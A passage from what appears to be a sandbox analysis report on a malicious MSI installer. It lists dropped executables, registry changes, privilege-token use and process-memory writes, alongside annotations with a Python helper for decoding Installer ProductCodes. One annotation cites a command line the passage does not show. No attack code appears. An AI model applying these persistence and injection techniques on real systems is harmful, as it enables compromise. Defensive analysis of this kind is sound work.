File opened for modification C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe N/A
File created C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.xml C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe N/A
File created C:\Program Files\TransformOptimisticContributor\wpsupdate.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\WSEcydALszNI C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.vbs C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
File created C:\Program Files\TransformOptimisticContributor\VC_redist.x64.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.xml C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe C:\Windows\System32\MsiExec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIC68C.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57c536.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57c534.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57c534.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{5E7ABEF0-9D09-49C1-952F-E73FA3349D07} C:\Windows\system32\msiexec.exe N/A
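The SourceHash{5E7ABEF0-9D09-49C1-952F-E73FA3349D07} file is keyed by the package's ProductCode, while the registry keys Windows Installer writes under Installer\Products (in the registry-class table further down) use a packed form of the same GUID: each of the first three groups is reversed, the last two are byte-pair swapped, and braces and hyphens are dropped. Converting between the two is what lets you go from a registry artefact to the product entry and back. The following is an added example, not the report's or Microsoft's code; the sample key paths are copied from this report and the functions are the example's own.

```python
"""Windows Installer packed ProductCode <-> GUID conversion. Added example,
not from the report; SAMPLE_KEYS are key paths recorded in this report."""
import re
from typing import List

GUID_RE = re.compile(r"^\{?([0-9A-F]{8})-([0-9A-F]{4})-([0-9A-F]{4})-([0-9A-F]{4})-([0-9A-F]{12})\}?$", re.I)
PACKED_RE = re.compile(r"[0-9A-F]{32}", re.I)

def _swap_pairs(s: str) -> str:
    """Swap adjacent characters: 'E73F' -> '7EF3' (its own inverse)."""
    return "".join(s[i + 1] + s[i] for i in range(0, len(s), 2))

def pack_guid(guid: str) -> str:
    """{5E7ABEF0-9D09-49C1-952F-E73FA3349D07} -> 0FEBA7E590D91C9459F27EF33A43D970"""
    m = GUID_RE.match(guid.strip())
    if not m:
        raise ValueError(f"not a GUID: {guid!r}")
    g1, g2, g3, g4, g5 = (x.upper() for x in m.groups())
    return g1[::-1] + g2[::-1] + g3[::-1] + _swap_pairs(g4) + _swap_pairs(g5)

def unpack_guid(packed: str) -> str:
    """Inverse of pack_guid; returns the braced, upper-case ProductCode."""
    p = packed.strip().upper()
    if not PACKED_RE.fullmatch(p):
        raise ValueError(f"not a packed GUID: {packed!r}")
    parts = (p[0:8][::-1], p[8:12][::-1], p[12:16][::-1], _swap_pairs(p[16:20]), _swap_pairs(p[20:32]))
    return "{" + "-".join(parts) + "}"

def product_codes_in_keys(keys: List[str]) -> List[str]:
    """Unique ProductCodes referenced by ...\\Installer\\Products\\<packed>\\... registry paths."""
    found: List[str] = []
    for key in keys:
        m = re.search(r"\\Installer\\Products\\([0-9A-F]{32})", key, re.I)
        if m:
            code = unpack_guid(m.group(1))
            if code not in found:
                found.append(code)
    return found

# Key paths as recorded in this report's "Modifies registry class" table.
SAMPLE_KEYS = [
    r"\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Version",
    r"\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\PackageName",
]
```

With the ProductCode in hand, the per-machine install record is HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\<packed>\InstallProperties (its LocalPackage value names the cached copy under C:\Windows\Installer, here f779176.msi with the submitted file's SHA256) and the Add/Remove entry is HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ProductCode}. Removing it with msiexec /x {ProductCode} re-runs the package's uninstall custom actions, so do that in a lab, not on a victim host.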

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
This is the ping 127.0.0.1 -n 2 between the two extraction commands in the cmd.exe command line above. Pinging loopback touches no network interface and is the standard cmd.exe idiom for a short delay, so the ATT&CK mapping is a sandbox mis-attribution: the ping sequences the two extractions, it does not test connectivity.

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = (binary value omitted) C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo\InfoLastHardInfo C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHDt = "19" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHD3Verify_C = 32003000320034002d00310031002d00310039007c00570044004300200032002e0035002b00320033003200310033003800380030003400310036003500200020002000200020002000200020007c00430036002d00370030002d00390030002d00440044002d00310035002d00390039000000 C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo\InfoCurHardInfo = "29a56b8a14940c3acb7a4a6443907c56|55963946ec73b9e1d4c0264c2c6a0401" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\JITDebug = "0" C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHD3_C = "e1c88404c6b9f73bfc8d61a168abb5a4" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo\InfoHDModifiedType = "hdidRecalByOldHdidFromRegIsEmpty|2024-11-19" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\System32\WScript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHD = "e1c88404c6b9f73bfc8d61a168abb5a4" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0 C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHD3t = "19" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Version = "100859912" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\PackageName = "wpsupdate.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\ED4346F32F1F8CA46B2D014BA47DCC9B C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\0FEBA7E590D91C9459F27EF33A43D970 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\ProductName = "TransformOptimisticContributor" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\0FEBA7E590D91C9459F27EF33A43D970\ProductFeature C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\PackageCode = "CCD296EAB4068834AB0FC3DB62EF5779" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\ED4346F32F1F8CA46B2D014BA47DCC9B\0FEBA7E590D91C9459F27EF33A43D970 C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: 35 N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: 35 N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 716 wrote to memory of 3600 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 716 wrote to memory of 2580 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 2580 wrote to memory of 1788 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 4232 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\cmd.exe
